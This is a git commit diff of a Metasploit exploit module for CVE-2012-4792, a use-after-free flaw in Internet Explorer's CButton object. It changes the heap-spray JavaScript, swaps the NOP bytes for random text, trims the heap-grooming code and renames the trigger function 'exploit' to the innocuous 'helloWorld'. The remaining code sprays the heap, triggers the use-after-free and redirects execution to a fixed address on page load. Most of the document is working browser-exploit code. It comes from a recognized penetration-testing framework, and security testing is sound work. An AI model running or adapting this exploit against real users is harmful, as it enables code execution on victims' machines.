Merge branch 'master' of github.com:rapid7/metasploit-framework

bug/bundler_fix
Joshua J. Drake 2012-12-31 11:02:12 -06:00
commit 2c411e3355
1 changed files with 6 additions and 37 deletions


@ -15,7 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info={})
super(update_info(info,
'Name' => "Microsoft Internet Explorer CDwnBindInfo Object Use-After-Free Vulnerability",
'Name' => "Microsoft Internet Explorer CButton Object Use-After-Free Vulnerability",
'Description' => %q{
This module exploits a vulnerability found in Microsoft Internet Explorer. A
use-after-free condition occurs when a CButton object is freed, but a reference
@ -37,6 +37,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
[ 'CVE', '2012-4792' ],
[ 'US-CERT-VU', '154201' ],
[ 'BID', '57070' ],
[ 'URL', 'http://blog.fireeye.com/research/2012/12/council-foreign-relations-water-hole-attack-details.html'],
[ 'URL', 'http://eromang.zataz.com/2012/12/29/attack-and-ie-0day-informations-used-against-council-on-foreign-relations/'],
[ 'URL', 'http://blog.vulnhunt.com/index.php/2012/12/29/new-ie-0day-coming-mshtmlcdwnbindinfo-object-use-after-free-vulnerability/' ],
@ -108,7 +109,7 @@ class Metasploit3 < Msf::Exploit::Remote
def ie_heap_spray(my_target, p)
js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))
js_nops = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4), Rex::Arch.endian(target.arch))
# Land the payload at 0x0c0c0b30
js = %Q|
@ -124,7 +125,6 @@ class Metasploit3 < Msf::Exploit::Remote
for (var i=1; i < 0x300; i++) {
heap_obj.alloc(block);
}
var overflow = nops.substring(0, 10);
|
js = heaplib(js, {:noobfu => true})
@ -187,37 +187,11 @@ Stack Pivoting to eax:
<script>
#{js}
function exploit()
function helloWorld()
{
var e0 = null;
var e1 = null;
var e2 = null;
var arrObject = new Array(3000);
var elmObject = new Array(500);
for (var i = 0; i < arrObject.length; i++)
{
arrObject[i] = document.createElement('div');
arrObject[i].className = unescape("ababababababababababababababababababababa");
}
for (var i = 0; i < arrObject.length; i += 2)
{
arrObject[i].className = null;
}
CollectGarbage();
for (var i = 0; i < elmObject.length; i ++)
{
elmObject[i] = document.createElement('button');
}
for (var i = 1; i < arrObject.length; i += 2)
{
arrObject[i].className = null;
}
CollectGarbage();
try {
e0 = document.getElementById("a");
@ -230,19 +204,14 @@ Stack Pivoting to eax:
e2.appendChild(document.createElement('body'));
} catch(e) { }
CollectGarbage();
for(var i =0; i < 20; i++)
{
arrObject[i].className = unescape("ababababababababababababababababababababa");
}
var eip = window;
var data = "https://www.google.com/settings/account";
var data = "#{Rex::Text.rand_text_alpha(41)}";
eip.location = unescape("%u0b30%u0c0c" + data);
}
</script>
</head>
<body onload="eval(exploit())">
<body onload="eval(helloWorld())">
<form id="a">
</form>
<dfn id="b">